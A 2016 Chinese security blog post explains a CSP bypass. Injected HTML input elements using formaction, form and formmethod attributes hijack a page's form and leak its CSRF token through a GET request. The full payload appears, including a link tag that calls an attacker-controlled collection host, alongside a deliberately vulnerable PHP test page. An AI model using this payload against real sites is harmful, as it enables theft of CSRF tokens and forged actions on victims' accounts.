LoRexxar's Blog | 信息技术分享

input属性bypass csp

Blogs csp csrf
2016/04/08

前两天看到一篇文章,可以通过input标签的某些属性,来控制form获取crsftoken并且完美bypass csp。

文章的原文是在
https://labs.detectify.com/2016/04/04/csp-bypassing-form-action-with-reflected-xss/

首先测试环境设置default-src: 'none'禁止所有的js脚本,所以执行js是没办法了,但是却可以通过巧妙地方式csrf,这里使用的就是link标签,这里就不多说了,之前写过一篇文章专门讲link标签…

首先我们的测试环境是这样的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<html>

<body>

<div>[Reflected XSS vulnerability here]</div>

<form method=”POST” id=”subscribe” action=”/submit.php”>

<input type=”hidden” name=”csrftoken” value=”5f4dcc3b5aa765d61d8327deb882cf99” />

<input type=”submit” value=”Subscribe to newsletter” />

</form>

</body>

</html>

我们可以看到很清楚的hidden标签,里面会在表单提交的同时提交csrftoken来验证来源,这样可以在开启csp的时候,很有效的防御csrf的发生,这里我们的插入点在form的前面。

1
2
3
4
5
6
7
8
9
<html>
<body>
<div><?=@$_GET['xss']?></div>
<form method="POST" id="subscribe" action="/api/v1/newsletter/subscribe">
<input type="hidden" name="csrftoken" value="5f4dcc3b5aa765d61d8327deb882cf99" />
<input type="submit" value="Subscribe to newsletter" />
</form>
</body>
</html>

我们可以插入input标签

1
<div><input value="CLICK ME FOR POC" type="submit" formaction="" form="subscribe" formmethod="get" /> <input type="hidden" name="xss" form="subscribe" value="<link rel='subresource' href='http://xss.xxx.cc'>"/></div>

我们上面是构造的输入,有些属性我们不是很熟悉,那么就先看看吧。
http://www.w3school.com.cn/tags/tag_input.asp

属性 描述
formaction URL 覆盖表单的 action 属性。(适用于 type=”submit” 和 type=”image”)
formenctype 见注释 覆盖表单的 enctype 属性。(适用于 type=”submit” 和 type=”image”)
formmethod get&post 覆盖表单的 method 属性。(适用于 type=”submit” 和 type=”image”)
formnovalidate formnovalidate 覆盖表单的 novalidate 属性。 如果使用该属性,则提交表单时不进行验证。
formtarget _blank _self _parent _top framename 覆盖表单的 target 属性。(适用于 type=”submit” 和 type=”image”)

我们这下就比较好理解上面的payload了,上面构造的input覆盖了下面这个表单的各个属性。

通过这种方式我们可以把csrftoken通过get请求的方式放在请求里面,然后构造了link标签去请求自己的xss平台,这样在xss平台上,我们可以看到请求的来源,referer里可以看到get中的csrftokeno( ̄▽ ̄)ブ

忘了说,这里只有chrome能够实现,firefox无法实现

原文作者:LoRexxar

原文链接:https://lorexxar.cn/2016/04/08/input-bypasscsrf/

发表日期:April 8th 2016, 8:45:44 pm

更新日期:April 8th 2016, 10:11:34 pm

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
Total : 205
2023
2022
2021
2020
2019
2018
2017
2016
2015
2014
ctf Blogs sqli CSP xss java csp ssrf redis opcache nodejs race postMessage pdflatex csrf cve Hexo Shadow Brokers 0day windows php c curl Reprint bookshelf chrome_ext chrome dns cloudeye cmd shell linux node contract crypto RSA rabins mysql phpmailer dedecms 逻辑漏洞 book_notes 智能合约 docker phar rce dvp ctf web 漏洞分析 dz 反序列化漏洞 类型混淆漏洞 ecshop git access 伪协议 eth Fomo3D Essay checklist hctf misc php opcache eassy jsre clrf struts2 injection mimic pwnhub flask 格式化字符串 模板注入 wget js weblogic lfi pwn LFI win server信息收集 msf lcx端口转发 IPC通道入侵 fastcgi ssh_sock5 python tqdm virtualenv open_basedir crontab roundcube sangebaimao 参数污染 CBC LD_PRELOAD gopher fcgi Essry php伪协议 file_put_contents sqlmap game titan_souls wordpress 代码审计 条件竞争 SAST tools 白盒 静态分析 django LSpider 爬虫 tongda webdriver 随笔 blockchain devsecops whitebox chrome ext log4j2 jndi blog sca sast cs CVE-2022-39197 chatgpt wechat llm embeddings aicg sd midjourney aigc joern cpg neo4j oa
Blogs Reprint